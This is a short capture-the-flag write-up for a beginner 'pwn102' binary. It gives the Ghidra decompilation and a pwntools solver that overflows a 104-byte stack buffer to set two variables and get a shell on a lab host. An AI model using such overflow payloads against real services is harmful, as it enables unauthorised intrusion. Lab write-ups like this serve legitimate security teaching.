02 Spesific Modfying Stack

given binary :

pwn102.pwn102

Put in ghidra :

void main(void)

{
  undefined local_78 [104];
  int local_10;
  int local_c;
  
  setup();
  banner();
  local_c = 0xbadf00d;
  local_10 = -0x11e2153;
  printf("I need %x to %x\nAm I right? ",0xbadf00d,0xfee1dead);
  __isoc99_scanf(&DAT_00100b66,local_78);
  if ((local_c == 0xc0ff33) && (local_10 == 0xc0d3)) {
    printf("Yes, I need %x to %x\n",0xc0ff33,0xc0d3);
    system("/bin/sh");
    return;
  }
  puts("I\'m feeling dead, coz you said I need bad food :(");
                    /* WARNING: Subroutine does not return */
  exit(0x539);
}

we need to modfying stack local_c and local_10 by buffer overflowing local_78 104 bytes .

here are my solver :

import pwn
from pwnlib.util.net import p32

p = pwn.remote('10.10.22.66','9002')
pwn.context.log_level = 'debug'
p.recv()

# local_c/rbp-0x4 expected value : 0xc0ff33
# local_10/rbp-0x8 expected value : 0xc0d3

# why we must put 0xc0de / rbp-0x8 first? because buffer overflow overwriting stack it wil overwriting the biggest 0x first 
p.sendlineafter(' ',b'A'*104+ p32(0xc0d3) + p32(0xc0ff33) )
p.interactive()

how we can check the rbp? using pwndbg gdb.
here it is :
Pasted image 20240301165545.png

and run the script and get the flag.

Pasted image 20240301165631.png